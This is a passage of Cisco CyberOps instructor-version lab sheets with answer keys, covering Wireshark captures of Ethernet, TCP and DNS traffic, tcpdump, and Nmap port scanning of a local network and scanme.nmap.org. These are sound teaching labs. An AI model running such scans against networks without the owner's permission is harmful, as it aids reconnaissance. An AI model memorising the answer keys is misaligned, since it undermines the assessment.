f4:8c:50:62:62:6d
What is the Vendor ID (OUI) of the Source’s NIC? _______________________________________________
IntelCor (Intel Corporation)
What portion of the MAC address is the OUI? __________________________________________________
The first 3 octets of the MAC address indicate the OUI.
What is the Source’s NIC serial number? ______________________________________________________
62:62:6d

Part 2: Use Wireshark to Capture and Analyze Ethernet Frames

In Part 2, you will use Wireshark to capture local and remote Ethernet frames. You will then examine the
information that is contained in the frame header fields.

Step 1: Examine the network configuration of H3.

a. Start and log into your CyberOps Workstation using the following credentials:
Username: analyst Password: cyberops
b. Open a terminal emulator to start mininet and enter the following command at the prompt. When
prompted, enter cyberops as the password.
[analyst@secOps ~]$ sudo ./lab.support.files/scripts/cyberops_topo.py
[sudo] password for analyst:
c. At the mininet prompt, start terminal windows on host H3.
*** Starting CLI:
mininet> xterm H3
d. At the prompt on Node: h3, enter ifconfig to verify the IPv4 address and record the MAC address.

Host-interface IP Address MAC Address

H3-eth0 10.0.0.13 Answers may vary.

e. At the prompt on Node: H3, enter netstat -r to display the default gateway information.
[root@secOps ~]# netstat -r
Kernel IP routing table
Destination Gateway Genmask Flags MSS Window irtt Iface
default 10.0.0.1 0.0.0.0 UG 0 0 0 H3-eth0
10.0.0.0 0.0.0.0 255.255.255.0 U 0 0 0 H3-eth0
f. What is the IP address of the default gateway for the host H3? __________________________________
10.0.0.1

Step 2: Clear the ARP cache on H3 and start capturing traffic on H3-eth0.
a. In the terminal window for Node: H3, enter arp -n to display the content of the ARP cache.
[root@secOps analyst]# arp -n
b. If there is any existing ARP information in the cache, clear it by enter the following command: arp -d IP-
address. Repeat until all the cached information has been cleared.

 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Page 4 of 7 www.netacad.com
Lab – Using Wireshark to Examine Ethernet Frames

[root@secOps analyst]# arp -n

Address HWtype HWaddress Flags Mask Iface
10.0.0.11 ether 5a:d0:1d:01:9f:be C H3-eth0

[root@secOps analyst]# arp -d 10.0.0.11

Address HWtype HWaddress Flags Mask Iface
10.0.0.11 (incomplete) C H3-eth0
c. In the terminal window for Node: H3, open Wireshark and start a packet capture for H3-eth0 interface.
[root@secOps analyst]# wireshark-gtk &

Step 3: Ping H1 from H3.

a. From the terminal on H3, ping the default gateway and stop after send 5 echo request packets.
[root@secOps analyst]# ping -c 5 10.0.0.1
b. After the ping is completed, stop the Wireshark capture.

Step 4: Filter Wireshark to display only ICMP traffic.

Apply the icmp filter to the captured traffic so only ICMP traffic is shown in the results.

Step 5: Examine the first Echo (ping) request in Wireshark.

The Wireshark main window is divided into three sections: the Packet List pane (top), the Packet Details pane
(middle), and the Packet Bytes pane (bottom). If you selected the correct interface for packet capturing in
Step 3, Wireshark should display the ICMP information in the Packet List pane of Wireshark, similar to the
following example.

a. In the Packet List pane (top section), click the first frame listed. You should see Echo (ping) request
under the Info heading. This should highlight the line blue.
b. Examine the first line in the Packet Details pane (middle section). This line displays the length of the
frame; 98 bytes in this example.

 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Page 5 of 7 www.netacad.com
Lab – Using Wireshark to Examine Ethernet Frames

c. The second line in the Packet Details pane shows that it is an Ethernet II frame. The source and
destination MAC addresses are also displayed.
What is the MAC address of the PC’s NIC? _________________________________________________
42:28:b2:24:e0:cb in example
What is the default gateway’s MAC address? _______________________________________________
92:66:62:f0:14:21 in example
d. You can click the arrow at the beginning of the second line to obtain more information about the Ethernet
II frame.
What type of frame is displayed? _________________________________________________________
0x0800 or an IPv4 frame type.
e. The last two lines displayed in the middle section provide information about the data field of the frame.
Notice that the data contains the source and destination IPv4 address information.
What is the source IP address? __________________________________________________________
10.0.0.13 in the example
What is the destination IP address? _______________________________________________________
10.0.0.1 in the example
f. You can click any line in the middle section to highlight that part of the frame (hex and ASCII) in the
Packet Bytes pane (bottom section). Click the Internet Control Message Protocol line in the middle
section and examine what is highlighted in the Packet Bytes pane.

g. Click the next frame in the top section and examine an Echo reply frame. Notice that the source and
destination MAC addresses have reversed, because this frame was sent from the default gateway router
as a reply to the first ping.
What device and MAC address is displayed as the destination address?
____________________________________________________________________________________
The host H3, 42:28:b2:24:e0:cb in example.

 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Page 6 of 7 www.netacad.com
Lab – Using Wireshark to Examine Ethernet Frames

Step 6: Start a new capture in Wireshark.

a. Click the Start Capture icon to start a new Wireshark capture. You will receive a popup window asking if
you would like to save the previous captured packets to a file before starting a new capture. Click
Continue without Saving.
b. In the terminal window of Node: H3, send 5 echo request packets to 172.16.0.40.
c. Stop capturing packets when the pings are completed.

Step 7: Examine the new data in the packet list pane of Wireshark.
In the first echo (ping) request frame, what are the source and destination MAC addresses?
Source: ________________________________________________________________________________
This should be the MAC address of the PC.
Destination: ____________________________________________________________________________
This should be the MAC address of the Default Gateway.
What are the source and destination IP addresses contained in the data field of the frame?
Source: ________________________________________________________________________________
This is still the IP address of the PC.
Destination: ____________________________________________________________________________
This is the address of the server at 172.16.0.40.
Compare these addresses to the addresses you received in Step 5. The only address that changed is the
destination IP address. Why has the destination IP address changed, while the destination MAC address
remained the same?
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
Layer 2 frames never leave the LAN. When a ping is issued to a remote host, the source will use the Default
Gateway’s MAC address for the frame destination. The Default Gateway receives the packet, strips the Layer
2 frame information from the packet and then creates a new frame header with the next hop’s MAC address.
This process continues from router to router until the packet reaches its destination IP address.

Reflection
Wireshark does not display the preamble field of a frame header. What does the preamble contain?
_______________________________________________________________________________________
_______________________________________________________________________________________
The preamble field contains seven octets of alternating 1010 sequences, and one octet that signals the
beginning of the frame, 10101011.

 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Page 7 of 7 www.netacad.com
Lab - Using Wireshark to Observe the TCP 3-Way Handshake
(Instructor Version)
Instructor Note: Red font color or gray highlights indicate text that appears in the instructor copy only.

Mininet Topology

Objectives
Part 1: Prepare the Hosts to Capture the Traffic
Part 2: Analyze the Packets using Wireshark
Part 3: View the Packets using tcpdump

Background / Scenario
In this lab, you will use Wireshark to capture and examine packets generated between the PC browser using
the HyperText Transfer Protocol (HTTP) and a web server, such as www.google.com. When an application,
such as HTTP or File Transfer Protocol (FTP) first starts on a host, TCP uses the three-way handshake to
establish a reliable TCP session between the two hosts. For example, when a PC uses a web browser to surf
the Internet, a three-way handshake is initiated, and a session is established between the PC host and web
server. A PC can have multiple, simultaneous, active TCP sessions with various web sites.
Instructor Note: Using a packet sniffer, such as Wireshark, may be considered a breach of the security
policy of the school. It is recommended that permission be obtained before running Wireshark for this lab. If

 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Page 1 of 6 www.netacad.com
Lab - Using Wireshark to Observe the TCP 3-Way Handshake

using a packet sniffer is an issue, the instructor may wish to assign the lab as homework or perform a walk-
through demonstration.

Required Resources
 CyberOps Workstation Virtual Machine
 Internet access

Part 1: Prepare the Hosts to Capture the Traffic

a. Start the CyberOps VM. Log in with username analyst and the password cyberops.
b. Start Mininet.
[analyst@secOps ~]$ sudo lab.support.files/scripts/cyberops_topo.py
c. Start host H1 and H4 in Mininet.
*** Starting CLI:
mininet> xterm H1
mininet> xterm H4
d. Start the web server on H4.
[root@secOps analyst]#
/home/analyst/lab.support.files/scripts/reg_server_start.sh
e. Start the web browser on H1. This will take a few moments.
[root@secOps analyst]# firefox &
f. After the Firefox window opens, start a tcpdump session in the terminal Node: H1 and send the output to
a file called capture.pcap. With the -v option, you can watch the progress. This capture will stop after
capturing 50 packets, as it is configured with the option -c 50.
[root@secOps analyst]# tcpdump -i H1-eth0 -v -c 50 -w
/home/analyst/capture.pcap
g. After the tcpdump starts, quickly navigate to 172.16.0.40 in the Firefox web browser.

Part 2: Analyze the Packets using Wireshark

Step 1: Apply a filter to the saved capture.
a. Press ENTER to see the prompt. Start Wireshark on Node: H1. Click OK when prompted by the warning
regarding running Wireshark as superuser.
[root@secOps analyst]# wireshark-gtk &
b. In Wireshark, click File > Open. Select the saved pcap file located at /home/analyst/capture.pcap.
c. Apply a tcp filter to the capture. In this example, the first 3 frames are the interested traffic.

 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Page 2 of 6 www.netacad.com
Lab - Using Wireshark to Observe the TCP 3-Way Handshake

Step 2: Examine the information within packets including IP addresses, TCP port numbers,
and TCP control flags.
a. In this example, frame 1 is the start of the three-way handshake between the PC and the server on H4. In
the packet list pane (top section of the main window), select the first packet, if necessary.
b. Click the arrow to the left of the Transmission Control Protocol in the packet details pane to expand the
and examine the TCP information. Locate the source and destination port information.
c. Click the arrow to the left of the Flags. A value of 1 means that flag is set. Locate the flag that is set in
this packet.
Note: You may have to adjust the top and middle windows sizes within Wireshark to display the
necessary information.

What is the TCP source port number? _____________________________________________________

Answers will vary. In this example, the source port is 58716.
How would you classify the source port? ___________________________________________________
Dynamic or Private
What is the TCP destination port number? __________________________________________________
Port 80
How would you classify the destination port? ________________________________________________
Well-known, registered (HTTP or web protocol)
Which flag (or flags) is set? _____________________________________________________________
SYN flag
What is the relative sequence number set to? _______________________________________________
0

 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Page 3 of 6 www.netacad.com
Lab - Using Wireshark to Observe the TCP 3-Way Handshake

d. Select the next packet in the three-way handshake. In this example, this is frame 2. This is the web server
replying to the initial request to start a session.

What are the values of the source and destination ports? ______________________________________
Source Port is now 80, and Destination Port is now 58716
Which flags are set? ___________________________________________________________________
The Acknowledgment flag (ACK) and Syn flag (SYN)
What are the relative sequence and acknowledgment numbers set to?
____________________________________________________________________________________
The relative sequence number is 0, and the relative acknowledgment number is 1.
e. Finally, select the third packet in the three-way handshake.

 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Page 4 of 6 www.netacad.com
Lab - Using Wireshark to Observe the TCP 3-Way Handshake

Examine the third and final packet of the handshake.

Which flag (or flags) is set? _____________________________________________________________
Acknowledgment flag (ACK)
The relative sequence and acknowledgment numbers are set to 1 as a starting point. The TCP
connection is established and communication between the source computer and the web server can
begin.

Part 3: View the packets using tcpdump

You can also view the pcap file and filter for the desired information.
a. Open a new terminal window, enter man tcpdump. Note: You may need to press ENTER to see the
prompt.
Using the manual pages available with the Linux operating system, you read or search through the
manual pages for options for selecting the desired information from the pcap file.
[analyst@secOps ~]# man tcpdump
TCPDUMP(1) General Commands Manual TCPDUMP(1)

NAME
tcpdump - dump traffic on a network

SYNOPSIS
tcpdump [ -AbdDefhHIJKlLnNOpqStuUvxX# ] [ -B buffer_size ]
[ -c count ]
[ -C file_size ] [ -G rotate_seconds ] [ -F file ]
[ -i interface ] [ -j tstamp_type ] [ -m module ] [ -M secret ]
[ --number ] [ -Q in|out|inout ]
[ -r file ] [ -V file ] [ -s snaplen ] [ -T type ] [ -w file ]
[ -W filecount ]
[ -E spi@ipaddr algo:secret,... ]
[ -y datalinktype ] [ -z postrotate-command ] [ -Z user ]
[ --time-stamp-precision=tstamp_precision ]
[ --immediate-mode ] [ --version ]
[ expression ]
<some output omitted>
To search through the man pages, you can use / (searching forward) or ? (searching backward) to find
specific terms, and n to forward to the next match and q to quit. For example, search for the information
on the switch -r, type /-r. Type n to move to the next match. What does the switch -r do?
____________________________________________________________________________________
____________________________________________________________________________________
____________________________________________________________________________________
The option -r allows you to read packet from file that was saved using -w option with tcpdump or other
tools that write pcap or pcap-ng files, such as Wireshark.
b. In the same terminal, open the capture file using the following command to view the first 3 TCP packets
captured:
[analyst@secOps ~]# tcpdump -r /home/analyst/capture.pcap tcp -c 3
reading from file capture.pcap, link-type EN10MB (Ethernet)

 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Page 5 of 6 www.netacad.com
Lab - Using Wireshark to Observe the TCP 3-Way Handshake

13:58:30.647462 IP 10.0.0.11.58716 > 172.16.0.40.http: Flags [S], seq

2432755549, win 29200, options [mss 1460,sackOK,TS val 3864513189 ecr
0,nop,wscale 9], length 0
13:58:30.647543 IP 172.16.0.40.http > 10.0.0.11.58716: Flags [S.], seq
1766419191, ack 2432755550, win 28960, options [mss 1460,sackOK,TS val
50557410 ecr 3864513189,nop,wscale 9], length 0
13:58:30.647544 IP 10.0.0.11.58716 > 172.16.0.40.http: Flags [.], ack 1, win
58, options [nop,nop,TS val 3864513189 ecr 50557410], length 0
To view the 3-way handshake, you may need to increase the number of lines after the -c option.
c. Navigate to the terminal used to start Mininet. Terminate the Mininet by entering quit in the main
CyberOps VM terminal window.
mininet> quit
*** Stopping 0 controllers

*** Stopping 2 terms

*** Stopping 5 links
.....
*** Stopping 1 switches
s1
*** Stopping 5 hosts
H1 H2 H3 H4 R1
*** Done
[analyst@secOps ~]$
d. After quitting Mininet, enter sudo mn -c to clean up the processes started by Mininet. Enter the password
cyberops when prompted.
[analyst@secOps scripts]$ sudo mn -c
[sudo] password for analyst:

Reflection
1. There are hundreds of filters available in Wireshark. A large network could have numerous filters and many
different types of traffic. List three filters that might be useful to a network administrator.
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
Answers will vary but could include TCP, specific IP Addresses (source and/or destination), and protocols
such as HTTP.
2. What other ways could Wireshark be used in a production network?
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
Wireshark is often used for security purposes for after-the-fact analysis of normal traffic or after a network
attack. New protocols or services may need to be captured to determine what port or ports are used.

 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Page 6 of 6 www.netacad.com
Lab - Exploring Nmap (Instructor Version)
Instructor Note: Red font color or gray highlights indicate text that appears in the instructor copy only.

Topology

Objectives
Part 1: Exploring Nmap
Part 2: Scanning for Open Ports

Background / Scenario
Port scanning is usually part of a reconnaissance attack. There are a variety of port scanning methods that
can be used. We will explore how to use the Nmap utility. Nmap is a powerful network utility that is used for
network discovery and security auditing.

Required Resources
 CyberOps Workstation Virtual Machine
 Internet access

Part 1: Exploring Nmap

In this part, you will use manual pages (or man pages for short) to learn more about Nmap.
The man [ program |utility | function] command displays the manual pages associated with the arguments.
The manual pages are the reference manuals found on Unix and Linux OSs. These pages can include these
sections: Name, Synopsis, Descriptions, Examples, and See Also.
a. Start CyberOps Workstation VM.
b. Open a terminal.

 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Page 1 of 8 www.netacad.com
Lab - Exploring Nmap

c. At the terminal prompt, enter man nmap.

[analyst@secOps ~]$ man nmap

What is Nmap?
____________________________________________________________________________________
Nmap is a network exploration tool and security / port scanner.
What is nmap used for?
____________________________________________________________________________________
____________________________________________________________________________________
____________________________________________________________________________________
____________________________________________________________________________________
Nmap is used to scan a network and determine the available hosts and services offered in the network.
Some of the nmap features include host discovery, port scanning and operating system detection. Nmap
can be commonly used for security audits, to identify open ports, network inventory, and find
vulnerabilities in the network.
d. While in the man page, you can use the up and down arrow keys to scroll through the pages. You can
also press the space bar to forward one page at a time.
To search for a specific term or phrase use enter a forward slash (/) or question mark (?) followed by the
term or phrase. The forward slash searches forward through the document, and the question mark
searches backward through the document. The key n moves to the next match.

 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Page 2 of 8 www.netacad.com
Lab - Exploring Nmap

Type /example and press ENTER. This will search for the word example forward through the man page.

e. In the first instance of example, you see three matches. To move to the next match, press n.

Look at Example 1. What is the nmap command used?

____________________________________________________________________________________
Nmap -A -T4 scanme.nmap.org

 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Page 3 of 8 www.netacad.com
Lab - Exploring Nmap

Use the search function to answer the following questions.

What does the switch -A do?
____________________________________________________________________________________
____________________________________________________________________________________
-A: Enable OS detection, version detection, script scanning, and traceroute
What does the switch -T4 do?
____________________________________________________________________________________
____________________________________________________________________________________
____________________________________________________________________________________
-T4 for faster execution by prohibiting the dynamic scan delay from exceeding 10 ms for TCP ports. -T4 is
recommended for a decent broadband or ethernet connection.
f. Scroll through the page to learn more about nmap. Type q when finished.

Part 2: Scanning for Open Ports

In this part, you will use the switches from the example in the Nmap man pages to scan your localhost, your
local network, and a remote server at scanme.nmap.org.

Step 1: Scan your localhost.

a. If necessary, open a terminal on the VM. At the prompt, enter nmap -A -T4 localhost. Depending on your
local network and devices, the scan will take anywhere from a few seconds to a few minutes.
[analyst@secOps Desktop]$ nmap -A -T4 localhost

Starting Nmap 7.40 ( https://nmap.org ) at 2017-05-01 17:20 EDT

Nmap scan report for localhost (127.0.0.1)
Host is up (0.000056s latency).
Other addresses for localhost (not scanned): ::1
rDNS record for 127.0.0.1: localhost.localdomain
Not shown: 996 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.0.8 or later
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-r--r-- 1 0 0 0 Apr 19 15:23 ftp_test
22/tcp open ssh OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey:
| 2048 f1:61:50:02:94:ba:f2:bd:be:93:cf:14:58:36:b8:32 (RSA)
|_ 256 94:33:25:a5:0e:02:d7:bc:c8:b0:90:8a:a2:16:59:e5 (ECDSA)
23/tcp open telnet Openwall GNU/*/Linux telnetd
80/tcp open http nginx 1.12.0
|_http-server-header: nginx/1.12.0
|_http-title: Welcome to nginx!
Service Info: Host: Welcome; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at

https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 18.81 seconds

 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Page 4 of 8 www.netacad.com
Lab - Exploring Nmap

b. Review the results and answer the following questions.

Which ports and services are opened?
____________________________________________________________________________________
21/tcp: ftp, 22/tcp: ssh, 23/tcp: telnet, 80/tcp: http
For each of the open ports, record the software that is providing the services.
____________________________________________________________________________________
ftp: vsftpd, ssh: OpenSSH, Telnet: Openwall, http: gninx
What is the operating system?
____________________________________________________________________________________
Linux

Step 2: Scan your network.

Warning: Before using Nmap on any network, please gain the permission of the network owners
before proceeding.
a. At the terminal command prompt, enter ifconfig to determine the IP address and subnet mask for this
host. For this example, the IP address for this VM is 192.168.1.19 and the subnet mask is 255.255.255.0.
[analyst@secOps ~]$ ifconfig
enp0s3: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 192.168.1.19 netmask 255.255.255.0 broadcast 192.168.1.255
inet6 fe80::997f:9b16:5aae:1868 prefixlen 64 scopeid 0x20<link>
ether 08:00:27:c9:fa:a1 txqueuelen 1000 (Ethernet)
RX packets 34769 bytes 5025067 (4.7 MiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 10291 bytes 843604 (823.8 KiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
device interrupt 19 base 0xd000
Record the IP address and subnet mask for your VM. Which network does your VM belong to?
____________________________________________________________________________________
Answers will vary. This VM has an IP address of 192.168.1.19/24 and it is part of the 192.168.1.0/24
network.
b. To locate other hosts on this LAN, enter nmap -A -T4 network address/prefix. The last octet of the IP
address should be replaced with a zero. For example, in the IP address 192.168.1.19, the .19 is the last
octet. Therefore, the network address is 192.168.1.0. The /24 is called the prefix and is a shorthand for
the netmask 255.255.255.0. If your VM has a different netmask, search the Internet for a “CIDR
conversion table” to find your prefix. For example, 255.255.0.0 would be /16. The network address
192.168.1.0/24 is used in this example
Note: This operation can take some time, especially if you have many devices attached to the network. In
one test environment, the scan took about 4 minutes.
[analyst@secOps ~]$ nmap -A -T4 192.168.1.0/24

Starting Nmap 7.40 ( https://nmap.org ) at 2017-05-01 17:13 EDT

Nmap scan report for 192.168.1.1
Host is up (0.0097s latency).
Not shown: 996 closed ports

 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Page 5 of 8 www.netacad.com
Lab - Exploring Nmap

PORT STATE SERVICE VERSION

Nmap scan report for 192.168.1.19

Host is up (0.00016s latency).
Not shown: 996 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.0.8 or later
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-r--r-- 1 0 0 0 Apr 19 15:23 ftp_test
22/tcp open ssh OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey:
| 2048 f1:61:50:02:94:ba:f2:bd:be:93:cf:14:58:36:b8:32 (RSA)
|_ 256 94:33:25:a5:0e:02:d7:bc:c8:b0:90:8a:a2:16:59:e5 (ECDSA)
23/tcp open telnet Openwall GNU/*/Linux telnetd
80/tcp open http nginx 1.12.0
|_http-server-header: nginx/1.12.0
|_http-title: Welcome to nginx!
Service Info: Host: Welcome; OS: Linux; CPE: cpe:/o:linux:linux_kernel
<some output omitted>

Service detection performed. Please report any incorrect results at

https://nmap.org/submit/ .
Nmap done: 256 IP addresses (5 hosts up) scanned in 34.21 seconds
How many hosts are up?
____________________________________________________________________________________
Answers will vary.
From your Nmap results, list the IP addresses of the hosts that are on the same LAN as your VM. List
some of the services that are available on the detected hosts.
____________________________________________________________________________________
____________________________________________________________________________________
____________________________________________________________________________________
Answers will vary.

 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Page 6 of 8 www.netacad.com
Lab - Exploring Nmap

Step 3: Scan a remote server.

a. Open a web browser and navigate to scanme.nmap.org. Please read the message posted. What is the
purpose of this site?
____________________________________________________________________________________
This site allows users to learn about Nmap and test their Nmap installation.
b. At the terminal prompt, enter nmap -A -T4 scanme.nmap.org.
[analyst@secOps Desktop]$ nmap -A -T4 scanme.nmap.org

Starting Nmap 7.40 ( https://nmap.org ) at 2017-05-01 16:46 EDT

Nmap scan report for scanme.nmap.org (45.33.32.156)
Host is up (0.040s latency).
Other addresses for scanme.nmap.org (not scanned): 2600:3c01::f03c:91ff:fe18:bb2f
Not shown: 992 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux;
protocol 2.0)
| ssh-hostkey:
| 1024 ac:00:a0:1a:82:ff:cc:55:99:dc:67:2b:34:97:6b:75 (DSA)
| 2048 20:3d:2d:44:62:2a:b0:5a:9d:b5:b3:05:14:c2:a6:b2 (RSA)
|_ 256 96:02:bb:5e:57:54:1c:4e:45:2f:56:4c:4a:24:b2:57 (ECDSA)
25/tcp filtered smtp
80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: Go ahead and ScanMe!
135/tcp filtered msrpc
139/tcp filtered netbios-ssn
445/tcp filtered microsoft-ds
9929/tcp open nping-echo Nping echo
31337/tcp open tcpwrapped
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at

https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 23.96 seconds
c. Review the results and answer the following questions.
Which ports and services are opened?
____________________________________________________________________________________
22/tcp: ssh, 9929/tcp: n ping-echo, 31337/tcp: tcpwrapped, 80/tcp: http
Which ports and services are filtered?
____________________________________________________________________________________
135/tcp: msrpc, 139/tcp: netbios-ssn, 445/tcp: microsoft-ds, 25/tcp: smtp
What is the IP address of the server?
____________________________________________________________________________________
IPv4 address: 45.33.32.156 IPv6 address: 2600:3c01::f03c:91ff:fe18:bb2f

 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Page 7 of 8 www.netacad.com
Lab - Exploring Nmap

What is the operating system?

____________________________________________________________________________________
Ubuntu Linux

Reflection
Nmap is a powerful tool for network exploration and management. How can Nmap help with network security?
How can Nmap be used by a threat actor as a nefarious tool?
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
Nmap can be used to scan an internal network for specific open ports to identify the extent of a security
breach. It can also be used to inventory a network to ensure that all the systems are probably patched against
security concerns. On the other hand, nmap can be used for reconnaissance to determine open ports and
other information about the network.

 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Page 8 of 8 www.netacad.com
Lab - Using Wireshark to Examine a UDP DNS Capture (Instructor
Version)
Instructor Note: Red font color or gray highlights indicate text that appears in the instructor copy only.

Topology

Objectives
Part 1: Record a PC’s IP Configuration Information
Part 2: Use Wireshark to Capture DNS Queries and Responses
Part 3: Analyze Captured DNS or UDP Packets

Background / Scenario
When you use the Internet, you use the Domain Name System (DNS). DNS is a distributed network of
servers that translates user-friendly domain names like www.google.com to an IP address. When you type a
website URL into your browser, your PC performs a DNS query to the DNS server’s IP address. Your PC’s
DNS query and the DNS server’s response make use of the User Datagram Protocol (UDP) as the transport
layer protocol. UDP is connectionless and does not require a session setup as does TCP. DNS queries and
responses are very small and do not require the overhead of TCP.
In this lab, you will communicate with a DNS server by sending a DNS query using the UDP transport
protocol. You will use Wireshark to examine the DNS query and response exchanges with the same server.
Instructor Note: Using a packet sniffer, such as Wireshark, may be considered a breach of the security
policy of the school. It is recommended that permission be obtained before running Wireshark for this lab. If
using a packet sniffer is an issue, the instructor may wish to assign the lab as homework or perform a walk-
through demonstration.

Required Resources
 CyberOps Workstation Virtual Machine
 Internet access

Part 1: Record VM's IP Configuration Information

In Part 1, you will use commands on your CyberOps Workstation VM to find and record the MAC and IP
addresses of your VM’s virtual network interface card (NIC), the IP address of the specified default gateway,

 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Page 1 of 7 www.netacad.com
Lab - Using Wireshark to Examine a UDP DNS Capture

and the DNS server IP address specified for the PC. Record this information in the table provided. The
information will be used in parts of this lab with packet analysis.

IP address Answers will vary. 192.168.1.11

MAC address Answers will vary. 08:00:27:C9:FA:A1
Default gateway IP address Answers will vary. 192.168.1.1
DNS server IP address Answers will vary. 192.168.1.1

a. Open a terminal in the VM. Enter ifconfig at the prompt to display interface information.
[analyst@secOps ~]$ ifconfig
enp0s3: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 192.168.1.19 netmask 255.255.255.0 broadcast 192.168.1.255
inet6 fe80::997f:9b16:5aae:1868 prefixlen 64 scopeid 0x20<link>
ether 08:00:27:c9:fa:a1 txqueuelen 1000 (Ethernet)
RX packets 1381 bytes 87320 (85.2 KiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 24 bytes 1857 (1.8 KiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
device interrupt 19 base 0xd000
<some output omitted>
b. At the terminal prompt, enter cat /etc/resolv.conf to determine the DNS server.
[analyst@secOps ~]$ cat /etc/resolv.conf
# Generated by resolvconf
nameserver 192.168.1.1
c. At the terminal prompt, enter netstat -r to display the IP routing table to the default gateway IP address.
[analyst@secOps ~]$ netstat -r
Kernel IP routing table
Destination Gateway Genmask Flags MSS Window irtt Iface
default 192.168.1.1 0.0.0.0 UG 0 0 0 enp0s3
192.168.1.0 0.0.0.0 255.255.255.0 U 0 0 0 enp0s3
Note: The DNS IP address and default gateway IP address are often the same, especially in small
networks. However, in a business or school network, the addresses would most likely be different.

Part 2: Use Wireshark to Capture DNS Queries and Responses

In Part 2, you will set up Wireshark to capture DNS query and response packets. This will demonstrate the
use of the UDP transport protocol while communicating with a DNS server.
a. In the terminal window, start Wireshark and click OK when prompted.
[analyst@secOps ~]$ sudo wireshark-gtk
[sudo] password for analyst:

(wireshark-gtk:950): WARNING : Couldn't connect to accessibility bus:

Failed to connect to socket /tmp/dbus-REDRWOHelr: Connection refused
Gtk-Message: GtkDialog mapped without a transient parent. This is
discouraged.

 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Page 2 of 7 www.netacad.com
Lab - Using Wireshark to Examine a UDP DNS Capture

b. In the Wireshark window, select enp0s3 from the interface list and click Start.

c. After selecting the desired interface, click Start to capture the packets.
d. Open a web browser and type www.google.com. Press Enter to continue.
e. Click Stop to stop the Wireshark capture when you see Google’s home page.

Part 3: Analyze Captured DNS or UDP Packets

In Part 3, you will examine the UDP packets that were generated when communicating with a DNS server for
the IP addresses for www.google.com.

Step 1: Filter DNS packets.

a. In the Wireshark main window, type dns in the Filter field. Click Apply.
Note: If you do not see any results after the DNS filter was applied, close the web browser. In the terminal
window, type ping www.google.com as an alternative to the web browser.

b. In the packet list pane (top section) of the main window, locate the packet that includes Standard query
and A www.google.com. See frame 22 above as an example.

 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Page 3 of 7 www.netacad.com
Lab - Using Wireshark to Examine a UDP DNS Capture

Step 2: Examine the fields in a DNS query packet.

The protocol fields, highlighted in gray, are displayed in the packet details pane (middle section) of the main
window.
a. In the first line in the packet details pane, frame 22 had 74 bytes of data on the wire. This is the number of
bytes it took to send a DNS query to a named server requesting the IP addresses of www.google.com. If
you used a different web address, such as www.cisco.com, the byte count might be different.
b. The Ethernet II line displays the source and destination MAC addresses. The source MAC address is
from your VM because your VM originated the DNS query. The destination MAC address is from the
default gateway because this is the last stop before this query exits the local network.
Is the source MAC address the same as the one recorded from Part 1 for the VM?
____________________________________________________________________________________
The answer should be yes.
c. In the Internet Protocol Version 4 line, the IP packet Wireshark capture indicates that the source IP
address of this DNS query is 192.168.1.19 and the destination IP address is 192.168.1.1. In this example,
the destination address is the default gateway. The router is the default gateway in this network.
Can you identify the IP and MAC addresses for the source and destination devices?

Device IP Address MAC Address

VM Answers will vary. 192.168.1.19 Answers will vary. 08:00:27:C9:FA:A1

Default Gateway Answers will vary. 192.168.1.1 Answers will vary. 80:37:73:EA:B1:7A

The IP packet and header encapsulates the UDP segment. The UDP segment contains the DNS query
as the data.
d. Click the arrow next to User Datagram Protocol to view the details. A UDP header only has four fields:
source port, destination port, length, and checksum. Each field in a UDP header is only 16 bits as
depicted below.

e. Click the arrow next to User Datagram Protocol to view the details. Notice that there are only four fields.
The source port number in this example is 39964. The source port was randomly generated by the VM

 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Page 4 of 7 www.netacad.com
